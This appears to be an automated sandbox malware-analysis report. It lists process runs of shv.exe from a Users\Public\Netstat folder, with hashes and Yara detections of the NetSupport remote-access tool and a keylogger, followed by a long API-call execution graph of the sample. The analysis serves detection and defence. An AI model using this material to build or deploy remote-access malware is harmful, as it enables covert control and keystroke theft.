                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:09:10:37
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xab0000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:09:10:45
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xab0000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:12%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:26.7%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:25
                                                                                        execution_graph 26055 7ff70e7b1491 26056 7ff70e7b13c9 26055->26056 26059 7ff70e7b1900 26056->26059 26085 7ff70e7b1558 26059->26085 26062 7ff70e7b198b 26063 7ff70e7b1868 DloadReleaseSectionWriteAccess 6 API calls 26062->26063 26064 7ff70e7b1998 RaiseException 26063->26064 26065 7ff70e7b1408 26064->26065 26066 7ff70e7b1abd 26068 7ff70e7b1b85 26066->26068 26073 7ff70e7b1b1b GetProcAddress 26066->26073 26067 7ff70e7b1a3d LoadLibraryExA 26069 7ff70e7b1a54 GetLastError 26067->26069 26070 7ff70e7b1aa9 26067->26070 26093 7ff70e7b1868 26068->26093 26074 7ff70e7b1a69 26069->26074 26075 7ff70e7b1a7e 26069->26075 26070->26066 26071 7ff70e7b1ab4 FreeLibrary 26070->26071 26071->26066 26072 7ff70e7b19b4 26072->26066 26072->26067 26072->26068 26072->26070 26073->26068 26078 7ff70e7b1b30 GetLastError 26073->26078 26074->26070 26074->26075 26077 7ff70e7b1868 DloadReleaseSectionWriteAccess 6 API calls 26075->26077 26079 7ff70e7b1a8b RaiseException 26077->26079 26081 7ff70e7b1b45 26078->26081 26079->26065 26080 7ff70e7b1868 DloadReleaseSectionWriteAccess 6 API calls 26082 7ff70e7b1b67 RaiseException 26080->26082 26081->26068 26081->26080 26083 7ff70e7b1558 _com_raise_error 6 API calls 26082->26083 26084 7ff70e7b1b81 26083->26084 26084->26068 26086 7ff70e7b156e 26085->26086 26092 7ff70e7b15d3 26085->26092 26101 7ff70e7b1604 26086->26101 26089 7ff70e7b15ce 26091 7ff70e7b1604 DloadReleaseSectionWriteAccess 3 API calls 26089->26091 26091->26092 26092->26062 26092->26072 26094 7ff70e7b18d1 26093->26094 26095 7ff70e7b1878 26093->26095 26094->26065 26096 7ff70e7b1604 DloadReleaseSectionWriteAccess 3 API calls 26095->26096 26097 7ff70e7b187d 26096->26097 26098 7ff70e7b18cc 26097->26098 26099 7ff70e7b17d8 DloadProtectSection 3 API calls 26097->26099 26100 7ff70e7b1604 DloadReleaseSectionWriteAccess 3 API calls 26098->26100 26099->26098 26100->26094 26102 7ff70e7b161f 26101->26102 26104 7ff70e7b1573 26101->26104 26103 7ff70e7b1624 GetModuleHandleW 26102->26103 26102->26104 26105 7ff70e7b1639 26103->26105 26106 7ff70e7b163e GetProcAddress 26103->26106 26104->26089 26108 7ff70e7b17d8 26104->26108 26105->26104 26106->26105 26107 7ff70e7b1653 GetProcAddress 26106->26107 26107->26105 26110 7ff70e7b17fa DloadProtectSection 26108->26110 26109 7ff70e7b1802 26109->26089 26110->26109 26111 7ff70e7b183a VirtualProtect 26110->26111 26113 7ff70e7b16a4 VirtualQuery GetSystemInfo 26110->26113 26111->26109 26113->26111 26114 7ff70e7b11cf 26115 7ff70e7b1102 26114->26115 26116 7ff70e7b1900 _com_raise_error 14 API calls 26115->26116 26117 7ff70e7b1141 26116->26117 26118 7ff70e7b03e0 26119 7ff70e7b041f 26118->26119 26120 7ff70e7b0497 26118->26120 26151 7ff70e79aae0 26119->26151 26121 7ff70e79aae0 48 API calls 26120->26121 26124 7ff70e7b04ab 26121->26124 26126 7ff70e79da98 48 API calls 26124->26126 26127 7ff70e7b0442 memcpy_s 26126->26127 26130 7ff70e7b05c6 26127->26130 26135 7ff70e7b05cc 26127->26135 26143 7ff70e781fa0 26127->26143 26129 7ff70e7b0541 26148 7ff70e78250c 26129->26148 26161 7ff70e7b7904 26130->26161 26133 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26136 7ff70e7b05d2 26133->26136 26135->26133 26144 7ff70e781fb3 26143->26144 26145 7ff70e781fdc 26143->26145 26144->26145 26146 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26144->26146 26145->26129 26147 7ff70e782000 26146->26147 26149 7ff70e782516 SetDlgItemTextW 26148->26149 26150 7ff70e782513 26148->26150 26150->26149 26152 7ff70e79aaf3 26151->26152 26166 7ff70e799774 26152->26166 26155 7ff70e79ab86 26158 7ff70e79da98 26155->26158 26156 7ff70e79ab58 LoadStringW 26156->26155 26157 7ff70e79ab71 LoadStringW 26156->26157 26157->26155 26203 7ff70e79d874 26158->26203 26296 7ff70e7b783c 31 API calls 3 library calls 26161->26296 26163 7ff70e7b791d 26297 7ff70e7b7934 16 API calls abort 26163->26297 26173 7ff70e799638 26166->26173 26169 7ff70e7997d9 26183 7ff70e7b2320 26169->26183 26174 7ff70e799692 26173->26174 26182 7ff70e799730 26173->26182 26178 7ff70e7996c0 26174->26178 26196 7ff70e7a0f68 WideCharToMultiByte 26174->26196 26175 7ff70e7b2320 _handle_error 8 API calls 26177 7ff70e799764 26175->26177 26177->26169 26192 7ff70e799800 26177->26192 26181 7ff70e7996ef 26178->26181 26198 7ff70e79aa88 45 API calls 2 library calls 26178->26198 26199 7ff70e7ba270 31 API calls 2 library calls 26181->26199 26182->26175 26184 7ff70e7b2329 26183->26184 26185 7ff70e7997f2 26184->26185 26186 7ff70e7b2550 IsProcessorFeaturePresent 26184->26186 26185->26155 26185->26156 26187 7ff70e7b2568 26186->26187 26200 7ff70e7b2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26187->26200 26189 7ff70e7b257b 26201 7ff70e7b2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26189->26201 26193 7ff70e799840 26192->26193 26195 7ff70e799869 26192->26195 26202 7ff70e7ba270 31 API calls 2 library calls 26193->26202 26195->26169 26197 7ff70e7a0faa 26196->26197 26197->26178 26198->26181 26199->26182 26200->26189 26202->26195 26219 7ff70e79d4d0 26203->26219 26208 7ff70e79d9a3 26211 7ff70e79da17 26208->26211 26213 7ff70e79da3f 26208->26213 26209 7ff70e79d8e5 swprintf 26216 7ff70e79d974 26209->26216 26233 7ff70e7b9ef0 26209->26233 26260 7ff70e789d78 33 API calls 26209->26260 26212 7ff70e7b2320 _handle_error 8 API calls 26211->26212 26214 7ff70e79da2b 26212->26214 26215 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26213->26215 26214->26127 26217 7ff70e79da44 26215->26217 26216->26208 26261 7ff70e789d78 33 API calls 26216->26261 26220 7ff70e79d665 26219->26220 26222 7ff70e79d502 26219->26222 26223 7ff70e79cb80 26220->26223 26221 7ff70e781744 33 API calls 26221->26222 26222->26220 26222->26221 26225 7ff70e79cbb6 26223->26225 26230 7ff70e79cc80 26223->26230 26227 7ff70e79cc20 26225->26227 26228 7ff70e79cc7b 26225->26228 26231 7ff70e79cbc6 26225->26231 26227->26231 26262 7ff70e7b21d0 26227->26262 26271 7ff70e781f80 33 API calls 3 library calls 26228->26271 26272 7ff70e782004 33 API calls std::_Xinvalid_argument 26230->26272 26231->26209 26234 7ff70e7b9f36 26233->26234 26235 7ff70e7b9f4e 26233->26235 26284 7ff70e7bd69c 15 API calls memcpy_s 26234->26284 26235->26234 26236 7ff70e7b9f58 26235->26236 26286 7ff70e7b7ef0 35 API calls 2 library calls 26236->26286 26239 7ff70e7b9f3b 26285 7ff70e7b78e4 31 API calls _invalid_parameter_noinfo 26239->26285 26241 7ff70e7b9f69 __scrt_get_show_window_mode 26287 7ff70e7b7e70 15 API calls memcpy_s 26241->26287 26242 7ff70e7b2320 _handle_error 8 API calls 26243 7ff70e7ba10b 26242->26243 26243->26209 26245 7ff70e7b9fd4 26288 7ff70e7b82f8 46 API calls 3 library calls 26245->26288 26247 7ff70e7b9fdd 26248 7ff70e7b9fe5 26247->26248 26249 7ff70e7ba014 26247->26249 26289 7ff70e7bd90c 26248->26289 26251 7ff70e7ba06c 26249->26251 26252 7ff70e7ba092 26249->26252 26253 7ff70e7ba023 26249->26253 26256 7ff70e7ba01a 26249->26256 26257 7ff70e7bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26251->26257 26252->26251 26254 7ff70e7ba09c 26252->26254 26255 7ff70e7bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26253->26255 26258 7ff70e7bd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26254->26258 26259 7ff70e7b9f46 26255->26259 26256->26251 26256->26253 26257->26259 26258->26259 26259->26242 26260->26209 26261->26208 26263 7ff70e7b21db 26262->26263 26264 7ff70e7b21f4 26263->26264 26266 7ff70e7b21fa 26263->26266 26273 7ff70e7bbbc0 26263->26273 26264->26231 26267 7ff70e7b2205 26266->26267 26276 7ff70e7b2f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26266->26276 26277 7ff70e781f80 33 API calls 3 library calls 26267->26277 26270 7ff70e7b220b 26271->26230 26278 7ff70e7bbc00 26273->26278 26276->26267 26277->26270 26283 7ff70e7bf398 EnterCriticalSection 26278->26283 26284->26239 26285->26259 26286->26241 26287->26245 26288->26247 26290 7ff70e7bd911 RtlFreeHeap 26289->26290 26291 7ff70e7bd941 Concurrency::details::SchedulerProxy::DeleteThis 26289->26291 26290->26291 26292 7ff70e7bd92c 26290->26292 26291->26259 26295 7ff70e7bd69c 15 API calls memcpy_s 26292->26295 26294 7ff70e7bd931 GetLastError 26294->26291 26295->26294 26296->26163 26298 7ff70e7ab190 26641 7ff70e78255c 26298->26641 26300 7ff70e7ab1db 26301 7ff70e7ab1ef 26300->26301 26302 7ff70e7abe93 26300->26302 26447 7ff70e7ab20c 26300->26447 26305 7ff70e7ab1ff 26301->26305 26308 7ff70e7ab2db 26301->26308 26301->26447 26924 7ff70e7af390 26302->26924 26311 7ff70e7ab2a9 26305->26311 26312 7ff70e7ab207 26305->26312 26306 7ff70e7b2320 _handle_error 8 API calls 26313 7ff70e7ac350 26306->26313 26307 7ff70e7ab391 26649 7ff70e7822bc GetDlgItem 26307->26649 26308->26307 26314 7ff70e7ab2f5 26308->26314 26309 7ff70e7abec9 26316 7ff70e7abef0 GetDlgItem SendMessageW 26309->26316 26317 7ff70e7abed5 SendDlgItemMessageW 26309->26317 26310 7ff70e7abeba SendMessageW 26310->26309 26318 7ff70e7ab2cb EndDialog 26311->26318 26311->26447 26320 7ff70e79aae0 48 API calls 26312->26320 26312->26447 26321 7ff70e79aae0 48 API calls 26314->26321 26943 7ff70e7962dc GetCurrentDirectoryW 26316->26943 26317->26316 26318->26447 26324 7ff70e7ab236 26320->26324 26325 7ff70e7ab313 SetDlgItemTextW 26321->26325 26323 7ff70e7abf47 GetDlgItem 26953 7ff70e782520 26323->26953 26957 7ff70e781ec4 34 API calls _handle_error 26324->26957 26330 7ff70e7ab326 26325->26330 26328 7ff70e7ab3f5 26348 7ff70e7abcc5 26328->26348 26465 7ff70e7ab3b1 EndDialog 26328->26465 26329 7ff70e7ab408 GetDlgItem 26334 7ff70e7ab422 SendMessageW SendMessageW 26329->26334 26335 7ff70e7ab44f SetFocus 26329->26335 26339 7ff70e7ab340 GetMessageW 26330->26339 26330->26447 26333 7ff70e7ab246 26338 7ff70e7ab25c 26333->26338 26344 7ff70e78250c SetDlgItemTextW 26333->26344 26334->26335 26340 7ff70e7ab4f2 26335->26340 26341 7ff70e7ab465 26335->26341 26336 7ff70e7ab3da 26342 7ff70e781fa0 31 API calls 26336->26342 26356 7ff70e7ac363 26338->26356 26338->26447 26346 7ff70e7ab35e IsDialogMessageW 26339->26346 26339->26447 26663 7ff70e788d04 26340->26663 26347 7ff70e79aae0 48 API calls 26341->26347 26342->26447 26344->26338 26346->26330 26351 7ff70e7ab373 TranslateMessage DispatchMessageW 26346->26351 26352 7ff70e7ab46f 26347->26352 26353 7ff70e79aae0 48 API calls 26348->26353 26350 7ff70e7ab52c 26673 7ff70e7aef80 26350->26673 26351->26330 26958 7ff70e78129c 26352->26958 26357 7ff70e7abcd6 SetDlgItemTextW 26353->26357 26358 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26356->26358 26361 7ff70e79aae0 48 API calls 26357->26361 26363 7ff70e7ac368 26358->26363 26362 7ff70e7abd08 26361->26362 26378 7ff70e78129c 33 API calls 26362->26378 26373 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26363->26373 26366 7ff70e79aae0 48 API calls 26369 7ff70e7ab555 26366->26369 26376 7ff70e79da98 48 API calls 26369->26376 26370 7ff70e7ab498 26371 7ff70e7af0a4 24 API calls 26370->26371 26377 7ff70e7ab4a5 26371->26377 26380 7ff70e7ac36e 26373->26380 26384 7ff70e7ab568 26376->26384 26377->26363 26399 7ff70e7ab4e8 26377->26399 26408 7ff70e7abd31 26378->26408 26391 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26380->26391 26687 7ff70e7af0a4 26384->26687 26389 7ff70e7abdda 26400 7ff70e79aae0 48 API calls 26389->26400 26401 7ff70e7ac374 26391->26401 26395 7ff70e781fa0 31 API calls 26406 7ff70e7ab586 26395->26406 26398 7ff70e7ab5ec 26411 7ff70e7ab61a 26398->26411 26968 7ff70e7932a8 26398->26968 26399->26398 26701 7ff70e7afa80 26399->26701 26413 7ff70e7abde4 26400->26413 26418 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26401->26418 26406->26380 26406->26399 26408->26389 26419 7ff70e78129c 33 API calls 26408->26419 26714 7ff70e792f58 26411->26714 26430 7ff70e78129c 33 API calls 26413->26430 26424 7ff70e7ac37a 26418->26424 26425 7ff70e7abd7f 26419->26425 26436 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26424->26436 26432 7ff70e79aae0 48 API calls 26425->26432 26428 7ff70e7ab634 GetLastError 26429 7ff70e7ab64c 26428->26429 26726 7ff70e797fc4 26429->26726 26435 7ff70e7abe0d 26430->26435 26437 7ff70e7abd8a 26432->26437 26434 7ff70e7ab60e 26971 7ff70e7a9d90 12 API calls _handle_error 26434->26971 26451 7ff70e78129c 33 API calls 26435->26451 26441 7ff70e7ac380 26436->26441 26443 7ff70e781150 33 API calls 26437->26443 26452 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26441->26452 26446 7ff70e7abda2 26443->26446 26445 7ff70e7ab65e 26449 7ff70e7ab665 GetLastError 26445->26449 26450 7ff70e7ab674 26445->26450 27001 7ff70e782034 26446->27001 26447->26306 26449->26450 26456 7ff70e7ab71c 26450->26456 26458 7ff70e7ab72b 26450->26458 26460 7ff70e7ab68b GetTickCount 26450->26460 26453 7ff70e7abe4e 26451->26453 26454 7ff70e7ac386 26452->26454 26466 7ff70e781fa0 31 API calls 26453->26466 26457 7ff70e78255c 61 API calls 26454->26457 26456->26458 26474 7ff70e7abb79 26456->26474 26461 7ff70e7ac3e4 26457->26461 26462 7ff70e7aba50 26458->26462 26972 7ff70e796454 26458->26972 26729 7ff70e784228 26460->26729 26467 7ff70e7ac3e8 26461->26467 26477 7ff70e7ac489 GetDlgItem SetFocus 26461->26477 26504 7ff70e7ac3fd 26461->26504 26462->26465 26996 7ff70e78bd0c 33 API calls 26462->26996 26463 7ff70e7abdbe 26471 7ff70e781fa0 31 API calls 26463->26471 26465->26336 26475 7ff70e7abe78 26466->26475 26484 7ff70e7b2320 _handle_error 8 API calls 26467->26484 26480 7ff70e7abdcc 26471->26480 26490 7ff70e79aae0 48 API calls 26474->26490 26482 7ff70e781fa0 31 API calls 26475->26482 26476 7ff70e7aba75 26997 7ff70e781150 26476->26997 26488 7ff70e7ac4ba 26477->26488 26479 7ff70e7ab74e 26984 7ff70e79b914 102 API calls 26479->26984 26487 7ff70e781fa0 31 API calls 26480->26487 26481 7ff70e7ab6ba 26489 7ff70e781fa0 31 API calls 26481->26489 26491 7ff70e7abe83 26482->26491 26493 7ff70e7aca97 26484->26493 26487->26389 26501 7ff70e78129c 33 API calls 26488->26501 26495 7ff70e7ab6c8 26489->26495 26496 7ff70e7abba7 SetDlgItemTextW 26490->26496 26497 7ff70e781fa0 31 API calls 26491->26497 26492 7ff70e7aba8a 26498 7ff70e79aae0 48 API calls 26492->26498 26494 7ff70e7ab768 26500 7ff70e79da98 48 API calls 26494->26500 26739 7ff70e792134 26495->26739 26502 7ff70e782534 26496->26502 26497->26336 26503 7ff70e7aba97 26498->26503 26499 7ff70e7ac434 SendDlgItemMessageW 26505 7ff70e7ac454 26499->26505 26506 7ff70e7ac45d EndDialog 26499->26506 26507 7ff70e7ab7aa GetCommandLineW 26500->26507 26508 7ff70e7ac4cc 26501->26508 26509 7ff70e7abbc5 SetDlgItemTextW GetDlgItem 26502->26509 26510 7ff70e781150 33 API calls 26503->26510 26504->26467 26504->26499 26505->26506 26506->26467 26511 7ff70e7ab84f 26507->26511 26512 7ff70e7ab869 26507->26512 27005 7ff70e7980d8 33 API calls 26508->27005 26515 7ff70e7abbf0 GetWindowLongPtrW SetWindowLongPtrW 26509->26515 26516 7ff70e7abc13 26509->26516 26517 7ff70e7abaaa 26510->26517 26985 7ff70e7820b0 26511->26985 26989 7ff70e7aab54 33 API calls _handle_error 26512->26989 26515->26516 26759 7ff70e7ace88 26516->26759 26522 7ff70e781fa0 31 API calls 26517->26522 26518 7ff70e7ac4e0 26523 7ff70e78250c SetDlgItemTextW 26518->26523 26528 7ff70e7abab5 26522->26528 26530 7ff70e7ac4f4 26523->26530 26524 7ff70e7ab87a 26990 7ff70e7aab54 33 API calls _handle_error 26524->26990 26525 7ff70e7ab6f5 GetLastError 26526 7ff70e7ab704 26525->26526 26755 7ff70e79204c 26526->26755 26535 7ff70e781fa0 31 API calls 26528->26535 26536 7ff70e7ac526 SendDlgItemMessageW FindFirstFileW 26530->26536 26532 7ff70e7ab88b 26991 7ff70e7aab54 33 API calls _handle_error 26532->26991 26534 7ff70e7ace88 162 API calls 26539 7ff70e7abc3c 26534->26539 26540 7ff70e7abac3 26535->26540 26541 7ff70e7ac57b 26536->26541 26549 7ff70e7aca04 26536->26549 26909 7ff70e7af974 26539->26909 26551 7ff70e79aae0 48 API calls 26540->26551 26552 7ff70e79aae0 48 API calls 26541->26552 26542 7ff70e7ab89c 26992 7ff70e79b9b4 102 API calls 26542->26992 26547 7ff70e7ab8b3 26993 7ff70e7afbdc 33 API calls 26547->26993 26548 7ff70e7aca81 26548->26467 26549->26467 26549->26548 26554 7ff70e7acaa9 26549->26554 26597 7ff70e7acac6 26549->26597 26550 7ff70e7ace88 162 API calls 26565 7ff70e7abc6a 26550->26565 26555 7ff70e7abadb 26551->26555 26556 7ff70e7ac59e 26552->26556 26558 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26554->26558 26566 7ff70e78129c 33 API calls 26555->26566 26567 7ff70e78129c 33 API calls 26556->26567 26557 7ff70e7ab8d2 CreateFileMappingW 26560 7ff70e7ab911 MapViewOfFile 26557->26560 26561 7ff70e7ab953 ShellExecuteExW 26557->26561 26562 7ff70e7acaae 26558->26562 26559 7ff70e7abc96 26923 7ff70e782298 GetDlgItem EnableWindow 26559->26923 26994 7ff70e7b3640 26560->26994 26582 7ff70e7ab974 26561->26582 26568 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26562->26568 26565->26559 26569 7ff70e7ace88 162 API calls 26565->26569 26577 7ff70e7abb04 26566->26577 26570 7ff70e7ac5cd 26567->26570 26571 7ff70e7acab4 26568->26571 26569->26559 26572 7ff70e781150 33 API calls 26570->26572 26575 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26571->26575 26573 7ff70e7ac5e8 26572->26573 27006 7ff70e78e164 33 API calls 2 library calls 26573->27006 26574 7ff70e7ab9c3 26583 7ff70e7ab9ef 26574->26583 26584 7ff70e7ab9dc UnmapViewOfFile CloseHandle 26574->26584 26579 7ff70e7acaba 26575->26579 26576 7ff70e7abb5a 26580 7ff70e781fa0 31 API calls 26576->26580 26577->26424 26577->26576 26587 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26579->26587 26580->26465 26581 7ff70e7ac5ff 26585 7ff70e781fa0 31 API calls 26581->26585 26582->26574 26589 7ff70e7ab9b1 Sleep 26582->26589 26583->26401 26586 7ff70e7aba25 26583->26586 26584->26583 26588 7ff70e7ac60c 26585->26588 26591 7ff70e781fa0 31 API calls 26586->26591 26590 7ff70e7acac0 26587->26590 26588->26562 26594 7ff70e781fa0 31 API calls 26588->26594 26589->26574 26589->26582 26595 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26590->26595 26592 7ff70e7aba42 26591->26592 26593 7ff70e781fa0 31 API calls 26592->26593 26593->26462 26596 7ff70e7ac673 26594->26596 26595->26597 26598 7ff70e78250c SetDlgItemTextW 26596->26598 26600 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26597->26600 26599 7ff70e7ac687 FindClose 26598->26599 26601 7ff70e7ac6a3 26599->26601 26602 7ff70e7ac797 SendDlgItemMessageW 26599->26602 26603 7ff70e7acacc 26600->26603 27007 7ff70e7aa2cc 10 API calls _handle_error 26601->27007 26604 7ff70e7ac7cb 26602->26604 26607 7ff70e79aae0 48 API calls 26604->26607 26606 7ff70e7ac6c6 26608 7ff70e79aae0 48 API calls 26606->26608 26609 7ff70e7ac7d8 26607->26609 26610 7ff70e7ac6cf 26608->26610 26612 7ff70e78129c 33 API calls 26609->26612 26611 7ff70e79da98 48 API calls 26610->26611 26615 7ff70e7ac6ec memcpy_s 26611->26615 26614 7ff70e7ac807 26612->26614 26613 7ff70e781fa0 31 API calls 26616 7ff70e7ac783 26613->26616 26617 7ff70e781150 33 API calls 26614->26617 26615->26571 26615->26613 26618 7ff70e78250c SetDlgItemTextW 26616->26618 26619 7ff70e7ac822 26617->26619 26618->26602 27008 7ff70e78e164 33 API calls 2 library calls 26619->27008 26621 7ff70e7ac839 26622 7ff70e781fa0 31 API calls 26621->26622 26623 7ff70e7ac845 memcpy_s 26622->26623 26624 7ff70e781fa0 31 API calls 26623->26624 26625 7ff70e7ac87f 26624->26625 26626 7ff70e781fa0 31 API calls 26625->26626 26627 7ff70e7ac88c 26626->26627 26627->26579 26628 7ff70e781fa0 31 API calls 26627->26628 26629 7ff70e7ac8f3 26628->26629 26630 7ff70e78250c SetDlgItemTextW 26629->26630 26631 7ff70e7ac907 26630->26631 26631->26549 27009 7ff70e7aa2cc 10 API calls _handle_error 26631->27009 26633 7ff70e7ac932 26634 7ff70e79aae0 48 API calls 26633->26634 26635 7ff70e7ac93c 26634->26635 26636 7ff70e79da98 48 API calls 26635->26636 26638 7ff70e7ac959 memcpy_s 26636->26638 26637 7ff70e781fa0 31 API calls 26639 7ff70e7ac9f0 26637->26639 26638->26590 26638->26637 26640 7ff70e78250c SetDlgItemTextW 26639->26640 26640->26549 26642 7ff70e78256a 26641->26642 26643 7ff70e7825d0 26641->26643 26642->26643 27010 7ff70e79a4ac 26642->27010 26643->26300 26645 7ff70e78258f 26645->26643 26646 7ff70e7825a4 GetDlgItem 26645->26646 26646->26643 26647 7ff70e7825b7 26646->26647 26647->26643 26648 7ff70e7825be SetWindowTextW 26647->26648 26648->26643 26650 7ff70e782334 26649->26650 26651 7ff70e7822fc 26649->26651 27063 7ff70e7823f8 GetWindowTextLengthW 26650->27063 26653 7ff70e78129c 33 API calls 26651->26653 26654 7ff70e78232a memcpy_s 26653->26654 26655 7ff70e781fa0 31 API calls 26654->26655 26658 7ff70e782389 26654->26658 26655->26658 26656 7ff70e7823c8 26657 7ff70e7b2320 _handle_error 8 API calls 26656->26657 26659 7ff70e7823dd 26657->26659 26658->26656 26660 7ff70e7823f0 26658->26660 26659->26328 26659->26329 26659->26465 26661 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26660->26661 26662 7ff70e7823f5 26661->26662 26664 7ff70e788d34 26663->26664 26671 7ff70e788de8 26663->26671 26665 7ff70e788d42 memcpy_s 26664->26665 26668 7ff70e788de3 26664->26668 26670 7ff70e788d91 26664->26670 26665->26350 27087 7ff70e781f80 33 API calls 3 library calls 26668->27087 26670->26665 26672 7ff70e7b21d0 33 API calls 26670->26672 27088 7ff70e782004 33 API calls std::_Xinvalid_argument 26671->27088 26672->26665 26676 7ff70e7aefb0 26673->26676 26674 7ff70e7aefd7 26675 7ff70e7b2320 _handle_error 8 API calls 26674->26675 26677 7ff70e7ab537 26675->26677 26676->26674 27089 7ff70e78bd0c 33 API calls 26676->27089 26677->26366 26679 7ff70e7af02a 26680 7ff70e781150 33 API calls 26679->26680 26681 7ff70e7af03f 26680->26681 26683 7ff70e781fa0 31 API calls 26681->26683 26685 7ff70e7af04f memcpy_s 26681->26685 26682 7ff70e781fa0 31 API calls 26684 7ff70e7af076 26682->26684 26683->26685 26686 7ff70e781fa0 31 API calls 26684->26686 26685->26682 26686->26674 27090 7ff70e7aae1c PeekMessageW 26687->27090 26690 7ff70e7af0f5 26694 7ff70e7af101 ShowWindow SendMessageW SendMessageW 26690->26694 26691 7ff70e7af143 SendMessageW SendMessageW 26692 7ff70e7af1a4 SendMessageW 26691->26692 26693 7ff70e7af189 26691->26693 26695 7ff70e7af1c6 SendMessageW SendMessageW 26692->26695 26696 7ff70e7af1c3 26692->26696 26693->26692 26694->26691 